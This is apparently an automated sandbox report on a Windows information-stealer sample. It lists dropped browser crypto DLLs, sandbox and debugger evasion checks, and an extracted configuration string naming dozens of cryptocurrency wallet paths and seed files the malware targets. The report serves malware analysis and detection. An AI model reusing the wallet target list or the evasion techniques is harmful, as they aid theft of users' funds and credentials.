Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF6550 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_00EF6550
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: i3NmF0obCm.exe, i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: i3NmF0obCm.exe, 00000000.00000003.1729483221.0000000021854000.00000004.00000020.00020000.00000000.sdmp, JJKJDAEBFCBKECBGDBFC.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: i3NmF0obCm.exe Virustotal: Detection: 58%
Source: i3NmF0obCm.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: i3NmF0obCm.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF76E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00EF76E0
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF8EE5 push ecx; ret 0_2_00EF8EF8
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C50B536 push ecx; ret 0_2_6C50B549
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\i3NmF0obCm.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe API coverage: 6.2 %
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EEEDE0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EEEDE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EED1F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00EED1F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF3560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EF3560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EEB630 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00EEB630
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EE1600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EE1600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EEDB90 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00EEDB90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF2B70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00EF2B70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EEE450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00EEE450
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF31E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00EF31E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EED570 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EED570
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF2630 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00EF2630
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF5DA0 GetSystemInfo,wsprintfA, 0_2_00EF5DA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\i3NmF0obCm.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF8BFD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00EF8BFD
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF76E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00EF76E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF75D0 mov eax, dword ptr fs:[00000030h] 0_2_00EF75D0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EE6CD0 memset,RegOpenKeyExA,RegEnumValueA,StrStrA,GetProcessHeap,HeapFree,task, 0_2_00EE6CD0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EFB5E7 SetUnhandledExceptionFilter, 0_2_00EFB5E7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF8BFD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00EF8BFD
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF936E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00EF936E
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C50B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C50B66C
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C50B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C50B1F7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C6BAC62

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF7510 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00EF7510
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C50B341 cpuid 0_2_6C50B341
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF5A60 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00EF5A60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF5850 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00EF5850
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF5720 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_00EF5720
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF5900 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_00EF5900

Stealing of Sensitive Information

Source: Yara match File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR
Source: Yara match File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
